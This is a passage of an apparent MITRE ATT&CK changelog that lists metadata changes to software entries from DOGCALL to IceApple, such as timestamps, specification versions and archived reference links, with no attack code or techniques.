| modified | 2021-10-18 18:28:24.079000+00:00 | 2025-04-16 20:38:16.017000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0213] DOGCALL
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 02:37:34.915000+00:00 | 2024-11-17 15:01:33.385000+00:00 |
| external_references[2]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
[S0694] DRATzarus
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-17 13:52:45.671000+00:00 | 2025-04-16 20:38:09.054000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0334] DarkComet
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-28 00:53:12.228000+00:00 | 2025-04-16 20:38:08.057000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1066] DarkTortilla
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-06 21:19:39.591000+00:00 | 2025-04-16 20:38:12.375000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0187] Daserf
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 02:04:21.751000+00:00 | 2025-04-16 20:38:31.680000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0243] DealersChoice
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:28:13.547000+00:00 | 2025-04-16 20:38:22.471000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0354] Denis
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 03:36:59.569000+00:00 | 2025-04-16 20:38:43.085000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0021] Derusbi
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 22:03:44.668000+00:00 | 2025-04-16 20:38:23.924000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0659] Diavol
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-12-04 20:15:22.258000+00:00 | 2024-11-17 20:10:33.591000+00:00 |
| external_references[3]['description'] | FBI. (2022, January 19). Indicators of Compromise Associated with Diavol. Retrieved March 9, 2022. | FBI. (2022, January 19). Indicators of Compromise Associated with Diavol. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.ic3.gov/Media/News/2022/220120.pdf | https://www.ic3.gov/CSA/2022/220120.pdf |
[S0200] Dipsind
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:30:14.126000+00:00 | 2025-04-16 20:38:39.512000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1021] DnsSystem
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-09-01 15:52:24.575000+00:00 | 2025-04-16 20:38:21.017000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0281] Dok
Current version: 2.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-12 11:26:16.316000+00:00 | 2024-11-17 17:15:10.558000+00:00 |
| external_references[4]['description'] | fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved October 4, 2021. | fluffybunny. (2019, July 9). OSX.Dok Analysis. Retrieved November 17, 2024. |
| external_references[4]['url'] | http://www.hexed.in/2019/07/osxdok-analysis.html | https://web.archive.org/web/20221007144948/http://www.hexed.in/2019/07/osxdok-analysis.html |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0600] Doki
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-19 17:45:07.102000+00:00 | 2025-04-16 20:38:06.758000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0695] Donut
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-18 15:31:34.662000+00:00 | 2025-04-16 20:38:54.932000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0186] DownPaper
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:31:30.330000+00:00 | 2025-04-16 20:38:40.332000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0134] Downdelph
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 15:32:15.795000+00:00 | 2025-04-16 20:37:53.960000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0384] Dridex
Current version: 2.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-08-03 21:55:20.998000+00:00 | 2025-04-16 20:38:42.420000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0547] DropBook
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-08-18 23:44:04.697000+00:00 | 2025-04-16 20:38:03.046000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0502] Drovorub
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-09-18 20:55:03.153000+00:00 | 2025-04-16 20:38:25.508000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0567] Dtrack
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-18 22:01:45.646000+00:00 | 2025-04-16 20:38:44.292000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0038] Duqu
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-08 22:17:50.971000+00:00 | 2025-04-16 20:38:14.352000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0062] DustySky
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-27 19:53:40.705000+00:00 | 2025-04-16 20:38:14.194000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0024] Dyre
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-22 17:59:13.241000+00:00 | 2025-04-16 20:38:13.036000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0593] ECCENTRICBANDWAGON
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 17:28:32.335000+00:00 | 2025-04-16 20:38:41.289000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0605] EKANS
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-08 22:04:48.834000+00:00 | 2025-04-16 20:37:51.908000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0064] ELMER
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-26 23:33:26.355000+00:00 | 2025-04-16 20:38:03.197000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0568] EVILNUM
Current version: 1.0
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-01-19 18:23:52.922000+00:00 | 2024-11-17 23:13:51.280000+00:00 |
| external_references[3]['description'] | Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved December 22, 2021. | Adamitis, D. (2020, May 6). Phantom in the Command Shell. Retrieved November 17, 2024. |
| external_references[3]['url'] | https://www.prevailion.com/phantom-in-the-command-shell-2/ | https://web.archive.org/web/20221209052853/https://www.prevailion.com/phantom-in-the-command-shell-2/ |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0624] Ecipekac
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-11 14:18:23.361000+00:00 | 2025-04-16 20:37:59.458000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0554] Egregor
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-14 21:39:11.008000+00:00 | 2025-04-16 20:38:36.019000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0081] Elise
Current version: 1.3
|
|
|---|
| t | [Elise](https://attack.mitre.org/software/S0081) is a custom | t | [Elise](https://attack.mitre.org/software/S0081) is a custom |
| backdoor Trojan that appears to be used exclusively by [Lot | | backdoor Trojan that appears to be used exclusively by [Lot |
| us Blossom](https://attack.mitre.org/groups/G0030). It is pa | | us Blossom](https://attack.mitre.org/groups/G0030). It is pa |
| rt of a larger group of tools referred to as LStudio, ST Gro | | rt of a larger group of tools referred to as LStudio, ST Gro |
| up, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citatio | | up, and APT0LSTU.(Citation: Lotus Blossom Jun 2015)(Citation |
| n: Accenture Dragonfish Jan 2018) | | : Accenture Dragonfish Jan 2018) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 02:35:48.740000+00:00 | 2025-04-02 20:34:59.728000+00:00 |
| description | [Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of
tools referred to as LStudio, ST Group, and APT0LSTU. (Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018) | [Elise](https://attack.mitre.org/software/S0081) is a custom backdoor Trojan that appears to be used exclusively by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It is part of a larger group of tools referred to as LStudio, ST Group, and APT0LSTU.(Citation: Lotus Blossom Jun 2015)(Citation: Accenture Dragonfish Jan 2018) |
| external_references[4]['description'] | Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 14, 2018. | Accenture Security. (2018, January 27). DRAGONFISH DELIVERS NEW FORM OF ELISE MALWARE TARGETING ASEAN DEFENCE MINISTERS’ MEETING AND ASSOCIATES. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf | https://web.archive.org/web/20190508165226/https://www.accenture.com/t20180127T003755Z_w_/us-en/_acnmedia/PDF-46/Accenture-Security-Dragonfish-Threat-Analysis.pdf |
[S0082] Emissary
Current version: 1.3
|
|
|---|
| t | [Emissary](https://attack.mitre.org/software/S0082) is a Tro | t | [Emissary](https://attack.mitre.org/software/S0082) is a Tro |
| jan that has been used by [Lotus Blossom](https://attack.mit | | jan that has been used by [Lotus Blossom](https://attack.mit |
| re.org/groups/G0030). It shares code with [Elise](https://at | | re.org/groups/G0030). It shares code with [Elise](https://at |
| tack.mitre.org/software/S0081), with both Trojans being part | | tack.mitre.org/software/S0081), with both Trojans being part |
| of a malware group referred to as LStudio. (Citation: Lotus | | of a malware group referred to as LStudio.(Citation: Lotus |
| Blossom Dec 2015) | | Blossom Dec 2015) |
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 02:35:14.040000+00:00 | 2025-04-02 20:35:25.274000+00:00 |
| description | [Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio. (Citation: Lotus Blossom Dec 2015) | [Emissary](https://attack.mitre.org/software/S0082) is a Trojan that has been used by [Lotus Blossom](https://attack.mitre.org/groups/G0030). It shares code with [Elise](https://attack.mitre.org/software/S0081), with both Trojans being part of a malware group referred to as LStudio.(Citation: Lotus Blossom Dec 2015) |
[S0091] Epic
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-26 14:33:46.159000+00:00 | 2025-04-16 20:38:15.497000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0152] EvilGrab
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-23 15:14:18.597000+00:00 | 2025-04-16 20:38:00.969000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0343] Exaramel for Windows
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-26 18:59:38.457000+00:00 | 2025-04-16 20:37:52.840000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0361] Expand
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-20 18:43:16.989000+00:00 | 2025-04-16 20:38:56.328000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0569] Explosive
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-27 01:56:35.649000+00:00 | 2025-04-16 20:38:15.035000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0181] FALLCHILL
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-23 20:01:10.366000+00:00 | 2025-04-16 20:38:45.711000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0267] FELIXROOT
Current version: 2.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-04-11 02:33:38.488000+00:00 | 2024-11-17 16:15:55.203000+00:00 |
| external_references[4]['description'] | Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved July 31, 2018. | Patil, S. (2018, June 26). Microsoft Office Vulnerabilities Used to Distribute FELIXROOT Backdoor in Recent Campaign. Retrieved November 17, 2024. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html | https://web.archive.org/web/20200607025424/https://www.fireeye.com/blog/threat-research/2018/07/microsoft-office-vulnerabilities-used-to-distribute-felixroot-backdoor.html |
[S0036] FLASHFLOOD
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 02:54:51.882000+00:00 | 2024-11-17 15:05:25.105000+00:00 |
| external_references[1]['description'] | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved May 1, 2015. | FireEye Labs. (2015, April). APT30 AND THE MECHANICS OF A LONG-RUNNING CYBER ESPIONAGE OPERATION. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf | https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2015/05/20081935/rpt-apt30.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0173] FLIPSIDE
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:24:24.753000+00:00 | 2025-04-16 20:37:55.971000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0628] FYAnti
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-11 15:57:36.797000+00:00 | 2025-04-16 20:38:04.305000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0076] FakeM
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-27 20:41:21.473000+00:00 | 2025-04-16 20:38:32.986000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0512] FatDuke
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-16 01:45:28.826000+00:00 | 2025-04-16 20:38:08.387000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0171] Felismus
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 18:52:30.568000+00:00 | 2025-04-16 20:37:57.048000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0679] Ferocious
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-02-01 21:21:35.768000+00:00 | 2025-04-16 20:38:17.322000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0120] Fgdump
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:40:33.738000+00:00 | 2025-04-16 20:38:51.728000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0355] Final1stspy
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:41:11.166000+00:00 | 2025-04-16 20:38:28.188000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0143] Flame
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-10-12 17:51:18.408000+00:00 | 2025-04-16 20:38:46.014000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0381] FlawedAmmyy
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-18 15:59:26.387000+00:00 | 2025-04-16 20:38:04.147000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0193] Forfiles
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:54.018000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0503] FrameworkPOS
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-19 19:44:15.357000+00:00 | 2025-04-16 20:37:57.360000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0277] FruitFly
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-22 03:55:46.184000+00:00 | 2025-04-16 20:38:05.463000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0417] GRIFFON
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-23 19:20:45.892000+00:00 | 2025-04-16 20:37:52.695000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0049] GeminiDuke
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:43:20.186000+00:00 | 2025-04-16 20:37:57.198000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0460] Get2
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-06-16 16:48:16.541000+00:00 | 2025-04-16 20:37:54.423000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0597] GoldFinder
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-27 19:50:35.143000+00:00 | 2025-04-16 20:38:31.830000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0477] Goopy
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-07-11 20:35:28.082000+00:00 | 2025-04-16 20:38:41.645000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0690] Green Lambert
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2022-04-20 18:12:24.193000+00:00 | 2025-04-16 20:38:10.718000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0561] GuLoader
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-15 19:14:33.244000+00:00 | 2025-04-16 20:38:04.665000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0132] H1N1
Current version: 1.2
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:45:07.782000+00:00 | 2025-04-16 20:38:44.456000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0151] HALFBAKED
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:37:55.633000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0037] HAMMERTOSS
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-02-09 13:58:23.806000+00:00 | 2024-11-17 14:55:19.537000+00:00 |
| external_references[1]['description'] | FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved September 17, 2015. | FireEye Labs. (2015, July). HAMMERTOSS: Stealthy Tactics Define a Russian Cyber Threat Group. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf | https://services.google.com/fh/files/misc/rpt-apt29-hammertoss-stealthy-tactics-define-en.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0214] HAPPYWORK
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2024-09-04 20:44:43.949000+00:00 | 2024-11-17 15:01:33.385000+00:00 |
| external_references[1]['description'] | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved March 1, 2018. | FireEye. (2018, February 20). APT37 (Reaper): The Overlooked North Korean Actor. Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www2.fireeye.com/rs/848-DID-242/images/rpt_APT37.pdf | https://services.google.com/fh/files/misc/apt37-reaper-the-overlooked-north-korean-actor.pdf |
[S0246] HARDRAIN
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 19:45:04.248000+00:00 | 2025-04-16 20:38:33.134000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0061] HDoor
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-04-04 20:20:59.961000+00:00 | 2025-04-16 20:37:51.573000+00:00 |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0617] HELLOKITTY
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-10-18 18:33:58.599000+00:00 | 2025-04-16 20:38:11.555000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0135] HIDEDRV
Current version: 1.1
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:47:08.223000+00:00 | 2024-11-17 18:07:17.216000+00:00 |
| external_references[2]['description'] | Rascagnères, P.. (2016, October 27). Rootkit analysis: Use case on HideDRV. Retrieved March 9, 2017. | Rascagnères, P.. (2016, October 27). Rootkit analysis: Use case on HideDRV. Retrieved November 17, 2024. |
| external_references[2]['url'] | http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf | https://web.archive.org/web/20180202163754/http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0040] HTRAN
Current version: 1.2
Details
dictionary_item_added| STIX Field | Old value | New Value |
|---|
| x_mitre_deprecated | | False |
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2021-04-23 20:04:19.262000+00:00 | 2024-11-17 16:27:34.671000+00:00 |
| external_references[2]['description'] | Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 4, 2015. | Haq, T., Moran, N., Vashisht, S., Scott, M. (2014, September). OPERATION QUANTUM ENTANGLEMENT. Retrieved November 17, 2024. |
| external_references[2]['url'] | https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf | https://web.archive.org/web/20210920193513/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-quantum-entanglement.pdf |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0070] HTTPBrowser
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-20 02:22:13.185000+00:00 | 2025-04-16 20:38:39.195000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0047] Hacking Team UEFI Rootkit
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-30 16:48:12.607000+00:00 | 2025-04-16 20:38:05.792000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0499] Hancitor
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-10-16 00:41:06.476000+00:00 | 2025-04-16 20:38:42.270000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0224] Havij
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2018-10-17 00:14:20.652000+00:00 | 2025-04-16 20:38:57.107000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0009] Hikit
Current version: 1.3
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 22:03:44.668000+00:00 | 2024-11-17 15:43:38.148000+00:00 |
| external_references[1]['description'] | Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved June 6, 2016. | Glyer, C., Kazanciyan, R. (2012, August 20). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 1). Retrieved November 17, 2024. |
| external_references[1]['url'] | https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html | https://web.archive.org/web/20190216180458/https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-1.html |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0203] Hydraq
Current version: 2.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2023-03-20 22:03:44.662000+00:00 | 2024-11-17 19:55:07.589000+00:00 |
| external_references[14]['description'] | Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved March 19, 2018. | Moran, N. (2013, May 20). Ready for Summer: The Sunshop Campaign. Retrieved November 17, 2024. |
| external_references[14]['url'] | https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html | https://web.archive.org/web/20200302085651/https://www.fireeye.com/blog/threat-research/2013/05/ready-for-summer-the-sunshop-campaign.html |
| external_references[15]['description'] | Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved March 19, 2018. | Moran, N. et al.. (2013, November 10). Operation Ephemeral Hydra: IE Zero-Day Linked to DeputyDog Uses Diskless Method. Retrieved November 17, 2024. |
| external_references[15]['url'] | https://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html | https://web.archive.org/web/20190221032148/http://www.fireeye.com/blog/threat-research/2013/11/operation-ephemeral-hydra-ie-zero-day-linked-to-deputydog-uses-diskless-method.html |
| external_references[17]['description'] | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved February 15, 2018. | O'Gorman, G., and McDonald, G.. (2012, September 6). The Elderwood Project. Retrieved November 17, 2024. |
| external_references[17]['url'] | https://web.archive.org/web/20190717233006/http://www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf | https://web.archive.org/web/20190717233006/http:/www.symantec.com/content/en/us/enterprise/media/security_response/whitepapers/the-elderwood-project.pdf |
| x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
[S0537] HyperStack
Current version: 1.0
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-12-04 15:04:01.604000+00:00 | 2025-04-16 20:38:00.476000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S0189] ISMInjector
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
| modified | 2020-03-31 12:38:41.115000+00:00 | 2025-04-16 20:38:11.226000+00:00 |
| x_mitre_attack_spec_version | 2.1.0 | 3.2.0 |
[S1022] IceApple
Current version: 1.1
Details
values_changed| STIX Field | Old value | New Value |
|---|
